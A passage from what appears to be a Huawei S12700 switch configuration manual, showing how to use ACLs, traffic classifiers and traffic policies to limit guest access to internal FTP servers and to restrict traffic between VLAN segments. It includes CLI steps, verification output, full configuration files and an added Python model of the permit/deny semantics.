access the Internet.
2. Configure ACLs on the Switch to match packets from guest areas.
3. Configure traffic classifiers on the Switch to classify packets based on ACLs.
4. Configure traffic behaviors on the Switch to re-mark flow IDs of packets matching
ACLs.
5. Configure a traffic policy that contains flow ID re-marking on the Switch, bind the traffic
behaviors and traffic classifiers to the traffic policy, and apply the traffic policy to the
Switch globally in the inbound direction.
6. Configure traffic classifiers on the Switch to classify packets from guest areas based on
flow IDs.
7. Configure traffic behaviors on the Switch to permit or reject packets from guest areas to
implement access control.
8. Configure a traffic policy for access control on the Switch, bind the traffic behaviors and
traffic classifiers to the traffic policy, and apply the traffic policy to the interfaces on the
Switch connected to guest areas in the inbound direction.

Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol (the static route is used here).
# Configure the Switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 40 //Create VLAN 10 to VLAN 40.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type access //Configure the interface as an access interface.
[Switch-GigabitEthernet1/0/1] port default vlan 10
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access
[Switch-GigabitEthernet1/0/2] port default vlan 20
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] port link-type access
[Switch-GigabitEthernet1/0/3] port default vlan 30
[Switch-GigabitEthernet1/0/3] quit
[Switch] interface gigabitethernet 1/0/4
[Switch-GigabitEthernet1/0/4] port link-type trunk //Configure the interface as a trunk interface.
[Switch-GigabitEthernet1/0/4] port trunk allow-pass vlan 10 20 30 40
[Switch-GigabitEthernet1/0/4] quit
[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 10.1.1.1 255.255.255.0 //Configure an IP address for the VLANIF interface.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 10.1.2.1 255.255.255.0
[Switch-Vlanif20] quit
[Switch] interface vlanif 30
[Switch-Vlanif30] ip address 10.1.3.1 255.255.255.0
[Switch-Vlanif30] quit
[Switch] interface vlanif 40
[Switch-Vlanif40] ip address 10.1.4.1 255.255.255.0


[Switch-Vlanif40] quit
[Switch] ip route-static 10.1.5.0 255.255.255.0 10.1.4.2 //Configure a static route.
[Switch] ip route-static 10.1.6.0 255.255.255.0 10.1.4.2
[Switch] ip route-static 10.1.7.0 255.255.255.0 10.1.4.2
[Switch] ip route-static 10.1.8.0 255.255.255.0 10.1.4.2

# Configure SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 40 50 60 70 80 //Create VLAN 40 to VLAN 80.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk //Configure the interface as a trunk interface.
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 40 50 60 70 80
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access //Configure the interface as an access interface.
[SwitchA-GigabitEthernet1/0/2] port default vlan 50
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type access
[SwitchA-GigabitEthernet1/0/3] port default vlan 60
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type access
[SwitchA-GigabitEthernet1/0/4] port default vlan 70
[SwitchA-GigabitEthernet1/0/4] quit
[SwitchA] interface gigabitethernet 1/0/5
[SwitchA-GigabitEthernet1/0/5] port link-type access
[SwitchA-GigabitEthernet1/0/5] port default vlan 80
[SwitchA-GigabitEthernet1/0/5] quit
[SwitchA] interface vlanif 40 //Create a VLANIF interface.
[SwitchA-Vlanif40] ip address 10.1.4.2 255.255.255.0 //Configure an IP address for the VLANIF interface.
[SwitchA-Vlanif40] quit
[SwitchA] interface vlanif 50
[SwitchA-Vlanif50] ip address 10.1.5.1 255.255.255.0
[SwitchA-Vlanif50] quit
[SwitchA] interface vlanif 60
[SwitchA-Vlanif60] ip address 10.1.6.1 255.255.255.0
[SwitchA-Vlanif60] quit
[SwitchA] interface vlanif 70
[SwitchA-Vlanif70] ip address 10.1.7.1 255.255.255.0
[SwitchA-Vlanif70] quit
[SwitchA] interface vlanif 80
[SwitchA-Vlanif80] ip address 10.1.8.1 255.255.255.0
[SwitchA-Vlanif80] quit
[SwitchA] ip route-static 10.1.1.0 255.255.255.0 10.1.4.1 //Configure a static route.
[SwitchA] ip route-static 10.1.2.0 255.255.255.0 10.1.4.1
[SwitchA] ip route-static 10.1.3.0 255.255.255.0 10.1.4.1

Step 2 Configure ACLs.


# Configure an ACL rule to match packets sent from the guest area to the confidential file
server.
[Switch] acl name non-access-file
[Switch-acl-adv-non-access-file] rule permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq 20 //Configure a rule to permit FTP data packets sent from the guest area to the confidential file server.
[Switch-acl-adv-non-access-file] rule permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq 21 //Configure a rule to permit FTP protocol packets sent from the guest area to the confidential file server.
[Switch-acl-adv-non-access-file] quit


# Configure an ACL rule to match packets sent from the guest area to the financial
department server.
[Switch] acl name non-access-finance
[Switch-acl-adv-non-access-finance] rule permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq 20 //Configure a rule to permit FTP data packets sent from the guest area to the financial department server.
[Switch-acl-adv-non-access-finance] rule permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq 21 //Configure a rule to permit FTP protocol packets sent from the guest area to the financial department server.
[Switch-acl-adv-non-access-finance] quit

# Configure an ACL rule to match packets sent from the guest area to the public file server.
[Switch] acl name access-file
[Switch-acl-adv-access-file] rule permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq 20 //Configure a rule to permit FTP data packets sent from the guest area to the public file server.
[Switch-acl-adv-access-file] rule permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq 21 //Configure a rule to permit FTP protocol packets sent from the guest area to the public file server.
[Switch-acl-adv-access-file] quit

# Configure an ACL rule to match packets sent from the guest area to the external network.
[Switch] acl name access-internet
[Switch-acl-adv-access-internet] rule permit tcp destination-port eq 80
[Switch-acl-adv-access-internet] quit

Step 3 Configure traffic classifiers.


# Configure traffic classifiers on the Switch to classify packets from guest areas based on
ACLs.
[Switch] traffic classifier non-access-file operator and
[Switch-classifier-non-access-file] if-match acl non-access-file //Configure the device to match packets sent from the guest area to the confidential file server.
[Switch-classifier-non-access-file] quit
[Switch] traffic classifier non-access-finance operator and
[Switch-classifier-non-access-finance] if-match acl non-access-finance //Configure the device to match packets sent from the guest area to the financial department server.
[Switch-classifier-non-access-finance] quit
[Switch] traffic classifier access-file operator and
[Switch-classifier-access-file] if-match acl access-file //Configure the device to match packets sent from the guest area to the public file server.
[Switch-classifier-access-file] quit
[Switch] traffic classifier access-internet operator and
[Switch-classifier-access-internet] if-match acl access-internet //Configure the device to match packets sent from the guest area to the external network.
[Switch-classifier-access-internet] quit

Step 4 Configure traffic behaviors.


# Create traffic behaviors on the Switch to re-mark flow IDs of packets.
[Switch] traffic behavior non-access-file
[Switch-behavior-non-access-file] remark flow-id 1 //Configure the device to re-mark the flow ID of packets sent from the guest area to the confidential file server with 1.
[Switch-behavior-non-access-file] quit
[Switch] traffic behavior non-access-finance
[Switch-behavior-non-access-finance] remark flow-id 2 //Configure the device to re-mark the flow ID of packets sent from the guest area to the financial department server with 2.
[Switch-behavior-non-access-finance] quit
[Switch] traffic behavior access-file
[Switch-behavior-access-file] remark flow-id 3 //Configure the device to re-mark the flow ID of packets sent from the guest area to the public file server with 3.
[Switch-behavior-access-file] quit
[Switch] traffic behavior access-internet
[Switch-behavior-access-internet] remark flow-id 4 //Configure the device to re-mark the flow ID of packets sent from the guest area to the external network with 4.
[Switch-behavior-access-internet] quit

Step 5 Configure a traffic policy that contains flow ID re-marking and apply the traffic policy
globally in the inbound direction.

# Create the traffic policy flow-id on the Switch, bind the traffic classifiers and traffic
behaviors to the traffic policy, and apply the traffic policy globally in the inbound direction.
[Switch] traffic policy flow-id
[Switch-trafficpolicy-flow-id] classifier non-access-file behavior non-access-file
[Switch-trafficpolicy-flow-id] classifier non-access-finance behavior non-access-
finance
[Switch-trafficpolicy-flow-id] classifier access-file behavior access-file
[Switch-trafficpolicy-flow-id] classifier access-internet behavior access-internet
[Switch-trafficpolicy-flow-id] quit
[Switch] traffic-policy flow-id global inbound

Step 6 Configure traffic classifiers.

# Configure traffic classifiers on the Switch to classify packets from guest areas based on flow
IDs.
[Switch] traffic classifier flow-id1 operator and
[Switch-classifier-flow-id1] if-match flow-id 1 //Configure the device to match
packets with the flow ID of 1, that is, packets sent from the guest area to the
confidential file server.
[Switch-classifier-flow-id1] quit
[Switch] traffic classifier flow-id2 operator and
[Switch-classifier-flow-id2] if-match flow-id 2 //Configure the device to match
packets with the flow ID of 2, that is, packets sent from the guest area to the
financial department server.
[Switch-classifier-flow-id2] quit
[Switch] traffic classifier flow-id3 operator and
[Switch-classifier-flow-id3] if-match flow-id 3 //Configure the device to match
packets with the flow ID of 3, that is, packets sent from the guest area to the
public file server.
[Switch-classifier-flow-id3] quit
[Switch] traffic classifier flow-id4 operator and
[Switch-classifier-flow-id4] if-match flow-id 4 //Configure the device to match
packets with the flow ID of 4, that is, packets sent from the guest area to the
external network.
[Switch-classifier-flow-id4] quit

Step 7 Configure traffic behaviors.

# Create traffic behaviors on the Switch to permit or reject matching packets.


[Switch] traffic behavior flow-id1
[Switch-behavior-flow-id1] deny //Configure the device to reject packets with
the flow ID of 1.
[Switch-behavior-flow-id1] quit
[Switch] traffic behavior flow-id2
[Switch-behavior-flow-id2] deny //Configure the device to reject packets with
the flow ID of 2.
[Switch-behavior-flow-id2] quit
[Switch] traffic behavior flow-id3
[Switch-behavior-flow-id3] permit //Configure the device to permit packets with
the flow ID of 3 to pass through.
[Switch-behavior-flow-id3] quit
[Switch] traffic behavior flow-id4
[Switch-behavior-flow-id4] permit //Configure the device to permit packets with
the flow ID of 4 to pass through.
[Switch-behavior-flow-id4] quit

Step 8 Configure a traffic policy for access control and apply the traffic policy to an interface.

# Create the traffic policy access_policy on the Switch, bind the traffic behaviors and traffic
classifiers to the traffic policy, and apply the traffic policy to GE1/0/1, GE1/0/2, and GE1/0/3
in the inbound direction to limit access of guest areas.
[Switch] traffic policy access_policy
[Switch-trafficpolicy-access_policy] classifier flow-id1 behavior flow-id1
[Switch-trafficpolicy-access_policy] classifier flow-id2 behavior flow-id2
[Switch-trafficpolicy-access_policy] classifier flow-id3 behavior flow-id3
[Switch-trafficpolicy-access_policy] classifier flow-id4 behavior flow-id4
[Switch-trafficpolicy-access_policy] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy access_policy inbound
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] traffic-policy access_policy inbound
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface gigabitethernet 1/0/3
[Switch-GigabitEthernet1/0/3] traffic-policy access_policy inbound
[Switch-GigabitEthernet1/0/3] quit

Step 9 Verify the configuration.


# Check the ACL configuration.
[Switch] display acl all
Total nonempty ACL number is 4

Advanced ACL access-internet 3996, 1 rule


Acl's step is 5
rule 5 permit tcp destination-port eq www (match-counter 0)

Advanced ACL access-file 3997, 2 rules


Acl's step is 5
rule 5 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp-data
(match-counter 0)
rule 10 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp (match-
counter 0)

Advanced ACL non-access-finance 3998, 2 rules


Acl's step is 5
rule 5 permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq ftp-data
(match-counter 0)
rule 10 permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq ftp (match-
counter 0)

Advanced ACL non-access-file 3999, 2 rules


Acl's step is 5
rule 5 permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq ftp-data
(match-counter 0)
rule 10 permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq ftp (match-
counter 0)

# Check the traffic classifier configuration.


[Switch] display traffic classifier user-defined
User Defined Classifier Information:
Classifier: flow-id1
Precedence: 25
Operator: AND
Rule(s) : if-match flow-id 1

Classifier: flow-id2
Precedence: 30
Operator: AND
Rule(s) : if-match flow-id 2

Classifier: flow-id3
Precedence: 35
Operator: AND
Rule(s) : if-match flow-id 3

Classifier: flow-id4
Precedence: 40
Operator: AND
Rule(s) : if-match flow-id 4

Classifier: non-access-file
Precedence: 5
Operator: AND
Rule(s) : if-match acl non-access-file

Classifier: non-access-finance
Precedence: 10
Operator: AND
Rule(s) : if-match acl non-access-finance

Classifier: access-file
Precedence: 15
Operator: AND
Rule(s) : if-match acl access-file

Classifier: access-internet
Precedence: 20
Operator: AND
Rule(s) : if-match acl access-internet

Total classifier number is 8

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined
User Defined Traffic Policy Information:
Policy: flow-id
Classifier: non-access-file
Operator: AND
Behavior: non-access-file
Permit
Remark:
Remark flow-id 1
Classifier: non-access-finance
Operator: AND
Behavior: non-access-finance
Permit
Remark:
Remark flow-id 2
Classifier: access-file
Operator: AND
Behavior: access-file
Permit
Remark:
Remark flow-id 3
Classifier: access-internet
Operator: AND
Behavior: access-internet
Permit
Remark:
Remark flow-id 4

Policy: access_policy
Classifier: flow-id1
Operator: AND
Behavior: flow-id1
Deny
Classifier: flow-id2
Operator: AND
Behavior: flow-id2
Deny
Classifier: flow-id3
Operator: AND
Behavior: flow-id3
Permit
Classifier: flow-id4
Operator: AND
Behavior: flow-id4
Permit

Total policy number is 2

----End

Configuration Files
- Configuration file of the Switch
#
sysname Switch
#
vlan batch 10 20 30 40
#
acl name access-internet 3996
rule 5 permit tcp destination-port eq www
acl name access-file 3997
rule 5 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp-data
rule 10 permit tcp destination 10.1.6.0 0.0.0.255 destination-port eq ftp
acl name non-access-finance 3998
rule 5 permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq ftp-data
rule 10 permit tcp destination 10.1.7.0 0.0.0.255 destination-port eq ftp
acl name non-access-file 3999
rule 5 permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq ftp-data
rule 10 permit tcp destination 10.1.5.0 0.0.0.255 destination-port eq ftp
#
traffic classifier access-file operator and precedence 15
if-match acl access-file
traffic classifier access-internet operator and precedence 20
if-match acl access-internet
traffic classifier flow-id1 operator and precedence 25
if-match flow-id 1
traffic classifier flow-id2 operator and precedence 30
if-match flow-id 2
traffic classifier flow-id3 operator and precedence 35
if-match flow-id 3
traffic classifier flow-id4 operator and precedence 40
if-match flow-id 4
traffic classifier non-access-file operator and precedence 5
if-match acl non-access-file
traffic classifier non-access-finance operator and precedence 10
if-match acl non-access-finance
#
traffic behavior access-file
permit
remark flow-id 3
traffic behavior access-internet
permit
remark flow-id 4
traffic behavior flow-id1
deny
traffic behavior flow-id2
deny
traffic behavior flow-id3
permit
traffic behavior flow-id4
permit
traffic behavior non-access-file
permit
remark flow-id 1
traffic behavior non-access-finance
permit
remark flow-id 2
#
traffic policy access_policy match-order config
classifier flow-id1 behavior flow-id1
classifier flow-id2 behavior flow-id2
classifier flow-id3 behavior flow-id3
classifier flow-id4 behavior flow-id4
traffic policy flow-id match-order config
classifier non-access-file behavior non-access-file
classifier non-access-finance behavior non-access-finance
classifier access-file behavior access-file
classifier access-internet behavior access-internet
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif30
ip address 10.1.3.1 255.255.255.0
#
interface Vlanif40
ip address 10.1.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type access
port default vlan 10
traffic-policy access_policy inbound
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 20
traffic-policy access_policy inbound
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 30
traffic-policy access_policy inbound
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 10 20 30 40
#
ip route-static 10.1.5.0 255.255.255.0 10.1.4.2
ip route-static 10.1.6.0 255.255.255.0 10.1.4.2
ip route-static 10.1.7.0 255.255.255.0 10.1.4.2
ip route-static 10.1.8.0 255.255.255.0 10.1.4.2
#
traffic-policy flow-id global inbound
#
return
- Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 40 50 60 70 80
#
interface Vlanif40
ip address 10.1.4.2 255.255.255.0
#
interface Vlanif50
ip address 10.1.5.1 255.255.255.0
#
interface Vlanif60
ip address 10.1.6.1 255.255.255.0
#
interface Vlanif70
ip address 10.1.7.1 255.255.255.0
#
interface Vlanif80
ip address 10.1.8.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 40 50 60 70 80
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 50
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 60
#
interface GigabitEthernet1/0/4
port link-type access
port default vlan 70
#
interface GigabitEthernet1/0/5
port link-type access
port default vlan 80
#
ip route-static 10.1.1.0 255.255.255.0 10.1.4.1
ip route-static 10.1.2.0 255.255.255.0 10.1.4.1
ip route-static 10.1.3.0 255.255.255.0 10.1.4.1
#
return

17.12 Example for Configuring a Traffic Policy to Limit Access Between Network Segments

Overview
Modular QoS Command-Line Interface (MQC) allows the device to classify traffic of a
certain type so that the device can provide the same service for packets of the same type and
differentiated services for packets of different types.
An advanced ACL can use the source and destination IP addresses to define the data flows
that are permitted or rejected. A traffic classifier references an ACL to classify packets, and
the permit or deny action is specified to process matched packets. Here, MQC is used to
implement access control between network segments.

Configuration Notes

Table 17-15 Applicable product models and versions

Product | Product Model     | Software Version
S12700  | S12708 and S12712 | V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
        | S12704            | V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

An ACL is often used with a traffic policy. A traffic policy is bound to the traffic classifier
matching an ACL and the traffic behavior such as permit/deny associated with the traffic
classifier.

The permit/deny actions in an ACL and a traffic behavior in the traffic policy are used as
follows.

ACL    | Traffic Behavior in the Traffic Policy | Final Action Taken for Matched Packets
permit | permit                                 | permit
permit | deny                                   | deny
deny   | permit                                 | deny
deny   | deny                                   | deny

A switch permits packets by default. To reject packets between network segments, define the
packets to be rejected in the ACL. If a bare rule permit command is used, all packets match this
rule; if the traffic behavior bound to it then defines the deny action, the switch filters all
packets, causing service interruptions.
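The following added Python model (not Huawei code) makes the table and the pitfall above concrete: it evaluates a packet against ACL rules in configuration order, combines the ACL result with the traffic behavior exactly as the table states, shows how a bare permit rule plus a deny behavior drops everything, and also runs the two-stage flow-ID design of 17.11 (remark in the global policy, filter on flow ID at the interface). Packets, the guest source address, and the assumption that the global policy is evaluated before the interface policy are constructed for the example.

```python
"""ACL + traffic-behavior evaluation model (added example, not Huawei code).
Semantics follow the table in Configuration Notes; packets, addresses and the
global-before-interface policy order are constructed assumptions."""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional, Tuple


@dataclass
class AclRule:
    action: str                    # "permit" or "deny"
    src: str = "0.0.0.0/0"         # source network ("source any" if omitted)
    dst: str = "0.0.0.0/0"         # destination network
    dport: Optional[int] = None    # "destination-port eq N", if present

    def matches(self, pkt: Dict) -> bool:
        return (ip_address(pkt["src"]) in ip_network(self.src)
                and ip_address(pkt["dst"]) in ip_network(self.dst)
                and (self.dport is None or pkt.get("dport") == self.dport))


def acl_lookup(rules: List[AclRule], pkt: Dict) -> Optional[str]:
    """First matching rule wins, in configuration order (rule 5, 10, 15 ...).
    None means no rule matched, so the classifier does not match the packet."""
    for rule in rules:
        if rule.matches(pkt):
            return rule.action
    return None


@dataclass
class Behavior:
    action: str = "permit"                # "permit" or "deny"
    remark_flow_id: Optional[int] = None  # "remark flow-id N", if configured


# A policy is an ordered list of (classifier kind, match, behavior); the
# classifier is ("acl", rules) or ("flow-id", n), mirroring the if-match forms.
Policy = List[Tuple[str, object, Behavior]]


def final_action(acl_result: str, behavior: str) -> str:
    """Final action for a matched packet, per the table above: forwarded only
    when both the ACL rule and the traffic behavior say permit."""
    return "permit" if (acl_result, behavior) == ("permit", "permit") else "deny"


def apply_policy(policy: Policy, pkt: Dict) -> str:
    """Evaluate one policy on a packet. The first matching classifier decides
    (match-order config); a remark behavior writes pkt["flow_id"] so a later
    policy can match on it. Unmatched packets are permitted by default."""
    for kind, match, behavior in policy:
        if kind == "acl":
            acl_result = acl_lookup(match, pkt)
            if acl_result is None:
                continue               # no rule hit: try the next classifier
        else:                          # kind == "flow-id"
            if pkt.get("flow_id") != match:
                continue
            acl_result = "permit"      # a flow-ID match carries no ACL action
        if behavior.remark_flow_id is not None:
            pkt["flow_id"] = behavior.remark_flow_id
        return final_action(acl_result, behavior.action)
    return "permit"                    # the switch permits packets by default


# Section 17.12: ACL 3000 bound to behavior b1 (permit), inbound on GE1/0/1.
ACL_3000 = [
    AclRule("deny", "192.168.1.0/24", "192.168.3.0/24"),    # rule 5
    AclRule("permit", "192.168.1.0/24", "192.168.2.0/24"),  # rule 10
    AclRule("permit"),                                      # rule 15: permit ip
]
P1: Policy = [("acl", ACL_3000, Behavior("permit"))]

# The pitfall described above: a bare "rule permit" matches every packet, so a
# deny behavior bound to it filters all traffic and interrupts service.
P1_MISCONFIGURED: Policy = [("acl", [AclRule("permit")], Behavior("deny"))]

# Section 17.11: policy flow-id remarks flow IDs from ACL matches (ftp-data=20,
# ftp=21, www=80); policy access_policy then filters on the flow ID alone.
FTP_PORTS = (20, 21)
FLOW_ID_POLICY: Policy = [
    ("acl", [AclRule("permit", dst="10.1.5.0/24", dport=p) for p in FTP_PORTS],
     Behavior("permit", remark_flow_id=1)),            # non-access-file
    ("acl", [AclRule("permit", dst="10.1.7.0/24", dport=p) for p in FTP_PORTS],
     Behavior("permit", remark_flow_id=2)),            # non-access-finance
    ("acl", [AclRule("permit", dst="10.1.6.0/24", dport=p) for p in FTP_PORTS],
     Behavior("permit", remark_flow_id=3)),            # access-file
    ("acl", [AclRule("permit", dport=80)],
     Behavior("permit", remark_flow_id=4)),            # access-internet
]
ACCESS_POLICY: Policy = [("flow-id", 1, Behavior("deny")),
                         ("flow-id", 2, Behavior("deny")),
                         ("flow-id", 3, Behavior("permit")),
                         ("flow-id", 4, Behavior("permit"))]


def guest_access(dst: str, dport: int) -> str:
    """Run a constructed guest packet (10.1.1.10) through both policies in the
    order the design relies on: global remarking policy, then interface policy."""
    pkt = {"src": "10.1.1.10", "dst": dst, "dport": dport}
    apply_policy(FLOW_ID_POLICY, pkt)        # stage 1: permit and remark
    return apply_policy(ACCESS_POLICY, pkt)  # stage 2: deny/permit by flow ID
```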

Networking Requirements
As shown in Figure 17-12, the company has three departments that belong to VLAN 10,
VLAN 20, and VLAN 30, respectively. To ensure security, users in VLAN 10 may access
VLAN 20 but not VLAN 30. All three departments need to access the Internet, and there are
no other limitations.

Figure 17-12 Access control between network segments

[Figure: VLAN 10 (192.168.1.0/24), VLAN 20 (192.168.2.0/24), and VLAN 30 (192.168.3.0/24) connect to SwitchA GE1/0/1, GE1/0/2, and GE1/0/3; SwitchA GE1/0/4 connects to Switch GE1/0/1; Switch GE1/0/2 connects to the Router (10.1.20.1/24), which connects to the external Network.]

Device  | Interface            | VLAN                          | Layer 3 Interface                   | IP Address
SwitchA | GigabitEthernet1/0/1 | VLAN 10                       | -                                   | -
        | GigabitEthernet1/0/2 | VLAN 20                       | -                                   | -
        | GigabitEthernet1/0/3 | VLAN 30                       | -                                   | -
        | GigabitEthernet1/0/4 | VLAN 10, VLAN 20, and VLAN 30 | -                                   | -
Switch  | GigabitEthernet1/0/1 | VLAN 10, VLAN 20, and VLAN 30 | VLANIF 10, VLANIF 20, and VLANIF 30 | VLANIF 10: 192.168.1.1/24; VLANIF 20: 192.168.2.1/24; VLANIF 30: 192.168.3.1/24
        | GigabitEthernet1/0/2 | VLAN 40                       | VLANIF 40                           | 10.1.20.2/24

Configuration Roadmap
The configuration roadmap is as follows:
1. Create VLANs, and configure interfaces and a routing protocol to implement
interworking between the company and external network.
2. Configure ACL rules on the Switch to define the data flows that are permitted or
rejected.
3. Configure a traffic classifier on the Switch to classify packets based on the ACL.
4. Configure a traffic behavior on the Switch and define the permit action (the ACL defines
the data flows that are rejected).
5. Configure a traffic policy on the Switch, bind the traffic policy to the traffic classifier
and traffic behavior, and apply the traffic policy to GE1/0/1.

Procedure
Step 1 Create VLANs, and configure interfaces and a routing protocol.
# Configure the switch.
<HUAWEI> system-view
[HUAWEI] sysname Switch
[Switch] vlan batch 10 20 30 40 //Create VLAN 10 to VLAN 40.
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] port link-type trunk //Set the link type of the
interface to trunk.
[Switch-GigabitEthernet1/0/1] port trunk allow-pass vlan 10 20 30 //Add the
interface to VLAN 10, VLAN 20, and VLAN 30.
[Switch-GigabitEthernet1/0/1] quit
[Switch] interface gigabitethernet 1/0/2
[Switch-GigabitEthernet1/0/2] port link-type access //Set the link type of the interface to access.
[Switch-GigabitEthernet1/0/2] port default vlan 40 //Add the interface to VLAN
40.
[Switch-GigabitEthernet1/0/2] quit
[Switch] interface vlanif 10 //Create a VLANIF interface.
[Switch-Vlanif10] ip address 192.168.1.1 255.255.255.0 //Configure an IP address
for the VLANIF interface. The IP address is the gateway address of network
segment 192.168.1.0/24.
[Switch-Vlanif10] quit
[Switch] interface vlanif 20
[Switch-Vlanif20] ip address 192.168.2.1 255.255.255.0
[Switch-Vlanif20] quit
[Switch] interface vlanif 30
[Switch-Vlanif30] ip address 192.168.3.1 255.255.255.0
[Switch-Vlanif30] quit
[Switch] interface vlanif 40 //Create a VLANIF interface.
[Switch-Vlanif40] ip address 10.1.20.2 255.255.255.0 //Configure an IP address
for the VLANIF interface to connect to the router.
[Switch-Vlanif40] quit
[Switch] ip route-static 0.0.0.0 0 10.1.20.1 //Configure a static route pointing
to the external network to implement interworking.

# Configure SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20 30 //Create VLAN 10 to VLAN 30.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type access //Set the link type of the
interface to access.
[SwitchA-GigabitEthernet1/0/1] port default vlan 10 //Add the interface to VLAN
10.
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type access
[SwitchA-GigabitEthernet1/0/2] port default vlan 20
[SwitchA-GigabitEthernet1/0/2] quit
[SwitchA] interface gigabitethernet 1/0/3
[SwitchA-GigabitEthernet1/0/3] port link-type access
[SwitchA-GigabitEthernet1/0/3] port default vlan 30
[SwitchA-GigabitEthernet1/0/3] quit
[SwitchA] interface gigabitethernet 1/0/4
[SwitchA-GigabitEthernet1/0/4] port link-type trunk //Set the link type of the
interface to trunk.
[SwitchA-GigabitEthernet1/0/4] port trunk allow-pass vlan 10 20 30
[SwitchA-GigabitEthernet1/0/4] quit

# Configure the router.


Configure the IP address of 10.1.20.1/24 for the interface of the router connected to the
Switch.
Step 2 Configure an ACL.
# Configure ACL rules on the Switch to define the data flows that are permitted or rejected.
[Switch] acl 3000
[Switch-acl-adv-3000] rule deny ip source 192.168.1.0 0.0.0.255 destination
192.168.3.0 0.0.0.255 //Configure an ACL rule to reject data flows from VLAN 10
to VLAN 30.
[Switch-acl-adv-3000] rule permit ip source 192.168.1.0 0.0.0.255 destination
192.168.2.0 0.0.0.255 //Configure an ACL rule to permit data flows from VLAN 10
to VLAN 20.
[Switch-acl-adv-3000] rule permit ip source any //Permit all other data flows. If
there are many internal network segments, this single rule covers them all.
[Switch-acl-adv-3000] quit

Step 3 Configure a traffic classifier.


# Configure a traffic classifier on the Switch to classify packets based on the ACL.

[Switch] traffic classifier c1 operator and
[Switch-classifier-c1] if-match acl 3000
[Switch-classifier-c1] quit

Step 4 Configure a traffic behavior.


# Configure a traffic behavior on the Switch and define the permit action.
[Switch] traffic behavior b1
[Switch-behavior-b1] permit
[Switch-behavior-b1] quit

Step 5 Configure a traffic policy and apply the traffic policy to an interface.
# Create a traffic policy on the Switch, bind the traffic behavior and traffic classifier to the
traffic policy, and apply the traffic policy to the inbound direction of GE1/0/1 connected to
SwitchA.
[Switch] traffic policy p1
[Switch-trafficpolicy-p1] classifier c1 behavior b1
[Switch-trafficpolicy-p1] quit
[Switch] interface gigabitethernet 1/0/1
[Switch-GigabitEthernet1/0/1] traffic-policy p1 inbound
[Switch-GigabitEthernet1/0/1] quit

Step 6 Verify the configuration.


# Check the ACL configuration.
[Switch] display acl 3000
Advanced ACL 3000, 3 rules
Acl's step is 5
rule 5 deny ip source 192.168.1.0 0.0.0.255 destination 192.168.3.0 0.0.0.255
(match-counter 0)
rule 10 permit ip source 192.168.1.0 0.0.0.255 destination 192.168.2.0 0.0.0.255
(match-counter 0)
rule 15 permit ip (match-counter 0)

# Check the traffic policy configuration.


[Switch] display traffic policy user-defined p1
User Defined Traffic Policy Information:
Policy: p1
Classifier: c1
Operator: AND
Behavior: b1
Permit

# User devices on network segment 192.168.1.0/24 can ping user devices on network segment
192.168.2.0/24, that is, users in VLAN 10 can access users in VLAN 20.
# User devices on network segment 192.168.1.0/24 cannot ping user devices on network
